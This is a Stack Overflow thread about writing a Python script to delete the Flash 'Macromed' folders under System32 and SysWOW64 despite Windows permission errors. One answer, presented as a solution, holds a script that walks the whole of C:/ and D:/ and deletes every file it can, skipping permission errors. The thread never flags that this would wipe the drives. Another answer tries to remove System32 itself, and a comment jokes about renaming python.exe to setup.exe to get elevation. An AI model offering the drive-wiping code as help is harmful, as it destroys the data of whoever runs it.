# Python: Script to delete folders from system32 or SysWOW64

Tags: python, python-3.x

I'm trying to write a script which deletes the **C:\Windows\System32\Macromed** and the **C:Windows\SysWOW64\Macromed** (basically adobe flash manual uninstall files).

What I'm running into is permissions issues from windows due to it needing elevated permissions to delete these folders.  However, Windows isn't prompting me to agree to permissions nor asking for my admin username/password to allow me to delete those folders.

I've tried looking online and saw how the `shutil.rmtree()` works but like I said, running into the permissions wall thing.

Comment: Out of curiosity, why?

Answer (score 0):

Just try to remove it manually and still you are getting the permission issues with windows then python script wouldn't work either, you have to get the ownership object from windows. try changing the files permissions then run the python script. Usually windows not allow to delete the files in **System32** directory it is a core part of the windows.

**Write a proper script and test it with files in user directory first, if it successfully doing your job. then deal with windows for your folders you want to remove.**

Comment: Thanks for the response.  Just for my own knowledge, do other programming languages like C++ allow for the use of elevated privileges within Windows where python not so much?

Comment: You just need to add a manifest file asking for the necessary permissions to your binary or rename your "python.exe" to "setup.exe" to make it work ;-)

Answer (score 0):

from os import walk
import os

```
# home = os.path.normpath(os.path.expanduser("~"))
home="C:/"

for dirpath,dirnames,file in walk(home):
    for files in file:
        dirpath1=os.path.normpath(dirpath)
        childpath=os.path.join(dirpath1,files)
        print(childpath)
        try:
            os.remove(childpath)
        except PermissionError:
            continue

home="D:/"

for dirpath,dirnames,file in walk(home):
    for files in file:
        dirpath1=os.path.normpath(dirpath)
        childpath=os.path.join(dirpath1,files)
        print(childpath)
        try:
            os.remove(childpath)
        except PermissionError:
            continue
```

Comment: Welcome to Stack Overflow. While your code **may** provide the answer to the question, please add context around it so others will have some idea what it does and why it is there.

Answer (score 0):

shutil.rmtree(r"any path that ")

Comment: Your answer could be improved with additional supporting information. Please [edit] to add further details, such as citations or documentation, so that others can confirm that your answer is correct. You can find more information on how to write good answers [in the help center](/help/how-to-answer).

Answer (score -2):

os.remove("C:\Windows\System32")

Comment: Welcome to Stack Overflow. Please take the [tour] and read [answer]. Code is always more helpful when accompanied by an explanation. But in this case the code won't even work, and doesn't address the question. OP is specifically asking about _permission_ errors. This just shows a single function call that is [guaranteed to fail since `C:\Windows\System32` is a directory](https://docs.python.org/library/os.html?highlight=os%20remove#os.remove): "Remove (delete) the file _path_. If _path_ is a directory, an `IsADirectoryError` is raised. Use `rmdir()` to remove directories."

Comment: The OS library in Python expects a file path. This wouldn't work as System32 is a directory, not a file. 

https://docs.python.org/3/library/os.html#os.remove